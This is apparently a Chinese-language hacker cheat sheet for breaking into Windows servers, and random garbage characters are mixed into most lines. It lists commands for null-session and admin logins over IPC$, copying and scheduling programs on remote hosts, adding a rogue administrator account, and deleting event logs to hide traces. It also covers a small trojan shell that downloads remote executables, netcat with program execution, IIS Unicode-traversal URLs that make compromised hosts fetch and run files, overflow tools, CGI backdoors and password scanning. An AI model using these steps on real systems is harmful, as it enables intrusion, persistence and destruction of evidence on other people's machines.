网管和黑客都必须知道的命令
<wj2:Z0 常用的几条NET命令:
>/5D/}4 ;`X -.45 (与远程主机建立空管连接) net use \\IP地址\ipc$ "" /use:""
kl3#&>e dE/Vl/ : (以管理员身份登录远程主机) net use \\IP地址\ipc$ "密码" /use:"Administrator"
5_G7XBvD/w Qs#v/r (传送文件到远程主机WINNT目录下)copy 本机目录路径\程序 \\IP地址\admin$
^a<=@0| '(^p$=3|@D (查看远程主机时间) net time \\IP地址
#mx;t3ja7 RL.%o?<&? (定时启动某个程序) at \\IP地址 02:18 readme.exe
+Nc|cj ?P{C=Td2z (查看共享) net view \\IP地址
N5%~~JRO Be8Gx (查看netbios工作组列表) nbtstat -A IP地址
@8n0GCv oo-^BG (将远程主机C盘映射为自己的F盘) net use f: \\IP地址\c$ ""/user:"Administrator"
cO)GiWE YDs/BF
Z (这两条把自己增加到管理员组): net user 用户名 密码 /add
cS QUK WDE_"Mm net localgroup Administrators 用户名 /add
cl:*Q{(Cjk AGK+~EjL@ (断开连接) net use \\IP地址\ipc$ /delete
uZd)o
AB ;)"r^M)): 扫尾:
MSRIG- 5A~w_p*} del C:\winnt\system32\logfiles\*.*
3w!oJB 1hi^ del C:\winnt\ssytem32\config\*.evt
\&ERSk2 GlQ=M )E del C:\winnt\system32\dtclog\*.*
aH'^`]'_= /\
~{ del C:\winnt\system32\*.log
|06J4H~k zrnc~I+
del C:\winnt\system32\*.txt
clG3t
eC 4sNM#]%| del C:\winnt\*.txt
Lm-}W "7 OSfwA& del C:\winnt\*.log
PCt&66F
8Q#&=]W$ 一、netsvc.exe
sDJ5'ul Br\/7F 下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务:
V&h,v%$ 2kCJqyWy netsvc /list \\IP地址
6K?+ad Klc ^4 es netsvc schedule \\IP地址 /query
5>h2WL //H+S
q66 netsvc \\IP地址 schedule /start
-lb}}z+/ X903;&Cim 二、OpenTelnet.exe
Pbm;@V rrbCg( 远程启动主机的Telnet服务,并绑定端口到7878,例如:
}Z0)FU+ e<iTU?eJM OpenTelnet \\IP地址 用户名 密码 1 7878
q.Z0Q "=4=Q\0PT 然后就可以telnet到主机的7878端口,进入DOS方式下:
aW w`v[v LT'#0dCC telnet IP地址 7878
D=9x/ ) *G ,!sAr;Rk` 三、winshell.exe
]r|.\}2Y7 .!)7x3|$[ 一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令:
BN#^
/a- 6"&&s p Path (查看winshell主程序的路径信息)
d{ OY ->8n.!F} b reBoot (重新启动机器)
nqiy)ZN#R Y*w<~m d shutDown (关闭机器)
^9cqT2:t {Z-5 s Shell (执行后你就会看到可爱的“C:\>”)
JhB{aW> M&Ycw XV:Z x eXit (退出本次登录会话,此命令并不终止winshell的运行)
q' _ |mMW"(~ CMD>
http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上)
tkNuM0 ':.d,x) 四、3389登陆器,GUI方式登录远程主机的
LjxTRtB_ F\,3z7s 五、elsave.exe
z^Oiwzo Z [68ji] 事件日志清除工具
I&1Mh4yu i}+dctg/ elsave -s \\IP地址 -l "application" -C
>OiC].1
'|WMt g elsave -s \\IP地址 -l "system" -C
$t}L|"=8X ap;*qiNFQ elsave -s \\IP地址 -l "security" -C
i$%;z~#wW 63:ZDQ 执行后成功清除应用程序日志,系统日志,安全日志
S&.DpsK fFSW\4JD= 六、hbulot.exe
Jc{zi^)(EN 8)R)h/E> 开启win2kserver和winxp的3389服务
(">!vz sjShm hbulot [/r]
%9Ulgs8 = 9J2%9,^ 使用/r表示安装完成后自动重起目标使设置生效。
+twBFhS7k BT`/OD@ 七、nc.exe(netcat.exe)
<
> f12pu hr]NW>; 一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。
/\#qz.c2K N;Hf7K 想要连接到某处: nc [-options] hostname port[s] [ports] ...
%v}:#_va] .HGEddcC 绑定端口等待连接: nc -l -p port [-options] [hostname] [port]
hQ<" XPWK"t01 参数:
mYa0_P%^ ~^Vt)/}Q -e prog 程序重定向,一旦连接,就执行 [危险!!]
HnOp*FP kw=+"U -g gateway source-routing hop point[s], up to 8
A:NsDEt W dIr3 -G num source-routing pointer: 4, 8, 12, ...
hnE@+(d=qJ Ev$?c9*> -h 帮助信息
o`G'E& [lyB@) 6. -i secs 延时的间隔
<V>vDno\ tYmWze.j -l 监听模式,用于入站连接
[!bTko>rSB <niHJ* -n 指定数字的IP地址,不能用hostname
3~Ipcr
B %li'j| -o file 记录16进制的传输
!f7}5/YC7v 7/aJ?:gX -p port 本地端口号
=;@5Ue
J Y\ 9uR!0 -r 任意指定本地及远程端口
aEX+M57k~ ?CmW{9O -s addr 本地源地址
_Vp9Y:mX2 G]q6Ika -u UDP模式
B.&q]CAv- `<\AnhNW]I -v 详细输出——用两个-v可得到更详细的内容
0>E` 9| _CI! 7% -w secs timeout的时间
v\\Z[,dK 9LCV"xgX -z 将输入输出关掉——用于扫描时
]^aece
t 八、TFTPD32.EXE
-V4@BKI8 O \lt!p3F 把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如:
q[dls_ 5^P)='0* http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:\winnt\system32\文件名
w6#hsRq[C hnG'L*HooE 然后可以直接令文件运行:
Z;??j+`Eo DZLSn Ax http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名
s "*Cb* <VgnrqF6: 九、prihack.exe是IIS的printer远程缓冲区溢出工具。idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。
OZk(VMuI 8$3 Tu"+; 一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接。
^pZ(^ u-j Gv| ,| 一、一 Xscan命令行运行参数说明:
Y
Xn)? i:{a-Bd 在检测过程中,按"[空格]"键可以查看各线程状态及扫描进度,按"q"键保存当前数据后提前退出程序,按"<ctrl+c>"强行关闭程序。
Y.Gr(]tk (* "R"Y 1.命令格式: xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项]
&?YQVwsN &XgB-}^: xscan -file <主机列表文件名> <检测项目> [其他选项]
,{:5Z:<| CS6,mX 其中<检测项目> 含义如下:
=b !f dwJ'hg -port : 检测常用服务的端口状态(可通过\dat\config.ini文件的"PORT-SCAN-OPTIONS\PORT-LIST"项定制待检测端口列表);
MdEZ839J Xg.\B1d -ftp : 检测FTP弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
Ibpk\a?A{ G9}[g)R* -ntpass : 检测NT-Server弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
Mx$VAV^\ 9\Yj`,i5 -cgi : 检测CGI漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
:5h&f l'-iIbKX -iis : 检测IIS漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
52-^HV W%~ S~wx [其他选项] 含义如下:
VA2%2g2n{ xE4T\%-K -v: 显示详细扫描进度
g-')|0py F/@#yQv? -p: 跳过Ping不通的主机
$Ce`(/ JUwP<C[ -o: 跳过没有检测到开放端口的主机
(lEWnf=2h QD /| zi -t <并发线程数量[,并发主机数量]>: 指定最大并发线程数量和并发主机数量, 默认数量为100,10